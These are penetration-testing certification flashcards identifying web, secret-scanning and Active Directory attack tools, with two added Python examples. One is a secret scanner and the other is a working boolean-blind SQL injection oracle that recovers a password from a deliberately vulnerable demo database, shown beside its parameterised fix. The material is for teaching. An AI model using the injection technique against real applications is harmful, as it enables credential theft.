13D: Identify Tools Flashcards
3.3 Given a scenario, research attack vectors and perform application-based attacks. 3.6 Given a scenario, perform a social engineering or physical attack. 5.3 Explain use cases of the following tools during the phases of a penetration test.
Git secrets search tool. It automatically crawls a repository and its commit history looking for accidentally committed secrets (API keys, tokens, passwords), flagging strings that match known credential formats or that have unusually high entropy. A leaked credential such as a GitHub token grants commit access, so an attacker who finds one can modify code in the repository.
trufflehog
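Added example (not trufflehog's own code): the secret-hunting technique the card describes, run over a constructed in-memory git-style history. Two detectors are combined the way trufflehog does, known credential formats via regex and high Shannon entropy for opaque keys. The regexes are assumptions approximating real formats, not trufflehog's rule set, and every commit hash, path and value is made up for the example (the AWS key is the documented AWS placeholder, not a live credential).

```python
# Added example, not trufflehog's own code: regex + entropy secret scan over a
# constructed git-style history. Patterns below are assumptions approximating
# real credential formats, not trufflehog's detectors.
import math
import re

# Assumed patterns: AWS access key ID and GitHub classic PAT prefixes.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}

# Alphabets and entropy thresholds (bits/char) for opaque-key candidates.
BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
HEX_CHARS = "0123456789abcdefABCDEF"
ENTROPY_RULES = (
    (BASE64_CHARS, "high_entropy_base64", 4.5),
    (HEX_CHARS, "high_entropy_hex", 3.0),
)
MIN_RUN = 20  # shorter runs are too often ordinary words or short IDs


def shannon_entropy(s: str) -> float:
    """Bits per character of s; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def runs_in_alphabet(word: str, alphabet: str) -> list:
    """Maximal substrings of word made only of characters from alphabet."""
    out, cur = [], []
    for ch in word:
        if ch in alphabet:
            cur.append(ch)
        elif cur:
            out.append("".join(cur))
            cur = []
    if cur:
        out.append("".join(cur))
    return out


def find_secrets(text: str) -> list:
    """Return (kind, value) findings for one blob of text."""
    findings = []
    masked = text
    for name, rx in PATTERNS.items():
        for m in rx.finditer(text):
            findings.append((name, m.group(0)))
        # Blank out regex hits so the entropy pass does not report them again.
        masked = rx.sub(lambda mm: " " * len(mm.group(0)), masked)
    for word in masked.split():
        for alphabet, kind, threshold in ENTROPY_RULES:
            for run in runs_in_alphabet(word, alphabet):
                if len(run) >= MIN_RUN and shannon_entropy(run) > threshold:
                    findings.append((kind, run))
    return findings


def scan_history(history: list) -> list:
    """Walk every (commit, path, content) blob, like a crawl of git history."""
    results = []
    for blob in history:
        for kind, value in find_secrets(blob["content"]):
            results.append({"commit": blob["commit"], "path": blob["path"],
                            "kind": kind, "value": value})
    return results


# Constructed history: hashes, paths and values are made up for the example.
HISTORY = [
    {"commit": "a1b2c3d", "path": "config/settings.py",
     "content": 'AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"\n'
                'SECRET_KEY = "Zq8vL2mN9xK4wR7tY3pB6cF1hJ5dG0sVaEuTiOkW"\n'},
    {"commit": "e4f5a6b", "path": "scripts/deploy.sh",
     "content": "export GH_TOKEN=ghp_A1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q7r8\n"
                'SESSION_SALT="f0e1d2c3b4a5968778695a4b3c2d1e0f"\n'},
    {"commit": "0c1d2e3", "path": "README.md",
     "content": "# Demo service\nNothing sensitive here.\n"},
]

if __name__ == "__main__":
    for hit in scan_history(HISTORY):
        print(f"{hit['commit']} {hit['path']}: {hit['kind']} -> {hit['value']}")
```

Note the division of labour: the AWS key has low entropy (it is mostly uppercase letters) and is caught only by its format, while the 40-character secret matches no known format and is caught only by entropy. Deleting a secret in a later commit does not help; a real scan walks every historical blob, which is why the example iterates the whole history rather than the current tree.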
CompTIA definition: Proxy that allows for both automated and manual testing and identification of vulnerabilities. It has many components that allow for different tasks to be performed.
This is a free and open-source web app scanner (similar to Burp)
OWASP ZAP
Proxy with a wide range of options to test web applications for different vulnerabilities. Its components allow you to perform particular types of automated testing, manually modifying requests, and passive analysis.
Burp Suite
Can discover subdomains (dns mode), directories and files (dir mode), and virtual hosts (vhost mode) by brute-forcing names from a wordlist of common names. This can reveal content that is not linked from anywhere on the site.
gobuster
Web application brute-force finder for directories and files. Ships with nine wordlists, including default directories and names commonly chosen by developers, and also supports a pure brute-force mode that generates candidate names itself instead of reading them from a list.
dirbuster
CompTIA definition: This Web Application Attack and Audit Framework allows you to identify and exploit a large set of web-based vulnerabilities, such as SQL injection and cross-site scripting. (included as a tool in Kali, has both a GUI and CLI interface, developed in Python)
w3af
A web application vulnerability scanner that automatically crawls a web app looking for places where it can inject data. Individual modules can be enabled or disabled to target different vulnerability classes.
wapiti
Focuses on web browser attacks: it hooks a target's browser through injected JavaScript and then assesses the target's actual security posture using client-side attack vectors.
beef
Automatically gathers data about a WordPress site and compares findings such as plugins against a database of known vulnerabilities. Provides useful information on findings, including plugin version and references to the vulnerability such as CVE number and link.
wpscan
Static code analysis security tool for Ruby on Rails applications. Checks for vulnerabilities and provides confidence level of finding (high, medium, weak).
brakeman
SQL injection scanner and exploitation tool. Automates detection and exploitation of many injection techniques (including boolean-based and time-based blind) and supports many database backends. Features include database fingerprinting, enumeration and data dumping, and, on supported backends, command execution.
sqlmap
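Added example (not sqlmap's own code): the boolean-based blind SQL injection that sqlmap automates, worked through by hand against a constructed, deliberately vulnerable lookup over an in-memory SQLite database. The attacker side only ever learns "row found" or "no row", yet recovers another user's password one character at a time; the parameterised version of the same lookup is shown beside the vulnerable one. Table, usernames and passwords are made up for the example.

```python
# Added example, not sqlmap's own code: boolean-based blind SQLi against a
# constructed vulnerable function over in-memory SQLite. All data is made up.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed target database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret!"), ("bob", "hunter2")])
    conn.commit()
    return conn


def vulnerable_user_exists(conn, username: str) -> bool:
    """The bug: user input is concatenated straight into the SQL string."""
    query = f"SELECT id FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchone() is not None


def safe_user_exists(conn, username: str) -> bool:
    """The fix: a bound parameter, so input can never change the query's structure."""
    row = conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


class BlindOracle:
    """Wraps the vulnerable endpoint as a yes/no oracle and counts requests."""

    def __init__(self, conn, known_user: str = "alice"):
        self.conn = conn
        self.known_user = known_user
        self.queries = 0

    def ask(self, condition: str) -> bool:
        # Close the string, AND our condition onto a row that is known to exist,
        # and comment out the application's trailing quote.
        payload = f"{self.known_user}' AND ({condition}) -- "
        self.queries += 1
        return vulnerable_user_exists(self.conn, payload)


def extract_length(oracle: BlindOracle, subquery: str, max_len: int = 64) -> int:
    """Find the secret's length by asking length() = n for n = 1..max_len."""
    for n in range(1, max_len + 1):
        if oracle.ask(f"length(({subquery})) = {n}"):
            return n
    raise ValueError("value longer than max_len, or subquery returned nothing")


def extract_char(oracle: BlindOracle, subquery: str, pos: int) -> str:
    """Binary-search one character's code point within printable ASCII (32..126)."""
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_value(oracle: BlindOracle, subquery: str) -> str:
    """Recover a scalar subquery result character by character."""
    length = extract_length(oracle, subquery)
    return "".join(extract_char(oracle, subquery, i) for i in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    o = BlindOracle(db)
    target = "SELECT password FROM users WHERE username = 'bob'"
    print(extract_value(o, target), "recovered in", o.queries, "requests")
```

The binary search needs about seven requests per character, which is why blind extraction is slow and noisy in logs (hundreds of near-identical requests differing only in a number); that request pattern is a useful detection signature, and the bound parameter in safe_user_exists is the fix the card's tool is looking for the absence of.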
Exploit finder that lets you search a local, offline copy of Exploit-DB. It also accepts Nmap output in XML format (the --nmap option) and automatically searches for exploits matching the detected services and versions.
searchsploit
Post-exploitation tool used to assess Active Directory environments and identify weaknesses in them, for example by spraying harvested credentials across hosts over SMB and enumerating shares and sessions.
crackmapexec